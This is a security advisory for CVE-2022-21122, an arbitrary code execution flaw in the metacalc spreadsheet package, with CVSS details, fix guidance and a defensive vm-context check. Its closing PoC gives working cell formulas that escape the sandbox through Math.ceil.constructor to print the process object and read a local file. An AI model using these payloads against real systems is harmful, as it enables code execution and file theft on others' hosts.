Arbitrary Code Execution Affecting metacalc package, versions <0.0.2
Snyk CVSS
- Attack Complexity: High
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.8% (82nd percentile)
- Snyk ID SNYK-JS-METACALC-2826197
- published 30 May 2022
- disclosed 17 May 2022
- credit Vladyslav Dukhin
Introduced: 17 May 2022
CVE-2022-21122
How to fix?
Upgrade metacalc to version 0.0.2 or higher.
Overview
metacalc provides spreadsheet calculations for Metarhia.
Affected versions of this package are vulnerable to Arbitrary Code Execution because they expose JavaScript's built-in Math object to the v8 context in which cell formulas are evaluated. Because Math is exposed to user-land, its methods can be used to reach JavaScript's Function constructor (for example through Math.ceil.constructor), which compiles and runs arbitrary code.
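The realm leak described above can be checked for directly. The following is an added example, not code from metacalc or from the advisory; it assumes Node.js and its built-in vm module, and all function names in it are hypothetical. It compares a context that receives the host's Math with one that uses the context's own Math, using only a benign probe.

```javascript
// Added example, not metacalc's code. Assumes Node.js and its built-in vm module.
const vm = require('node:vm');

// Weak setup: the host's own Math object is handed to the sandbox, so every
// Math method still inherits from the host realm's Function.prototype.
function evalWithHostMath(expr) {
  const context = vm.createContext({ Math });
  return vm.runInContext(expr, context);
}

// Corrected setup: no host objects are passed in. The new context has its own
// Math intrinsic, whose methods belong to the context's realm.
function evalWithContextMath(expr) {
  const context = vm.createContext(Object.create(null));
  return vm.runInContext(expr, context);
}

// Regression check: does a formula reach the host's Function constructor?
function reachesHostFunction(evaluate) {
  return evaluate('Math.ceil.constructor') === Function;
}

// Benign probe: is the host-only global `process` visible to code compiled
// through the constructor that a formula can reach?
function processVisible(evaluate) {
  return evaluate('Math.ceil.constructor("return typeof process")()') !== 'undefined';
}

console.log('host Math   :', reachesHostFunction(evalWithHostMath), processVisible(evalWithHostMath));
console.log('context Math:', reachesHostFunction(evalWithContextMath), processVisible(evalWithContextMath));
// Ordinary formulas keep working without the host's Math.
console.log('formula     :', evalWithContextMath('Math.ceil(1.2) + Math.max(3, 4)'));
```

Node's documentation states that the vm module is not a security mechanism, so this check guards against this specific leak only and does not make a vm context safe for untrusted formulas.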
PoC
const { Sheet } = require('metacalc');
const sheet = new Sheet();
sheet.cells['A1'] = '=Math.ceil.constructor("console.log(process)")()';
console.log(sheet.values['A1']);
sheet.cells['A3'] = '=Math.ceil.constructor("console.log(process.mainModule.require(\'fs\').readFileSync(\'./poc.js\', \'utf-8\'))")()';
console.log(sheet.values['A3']);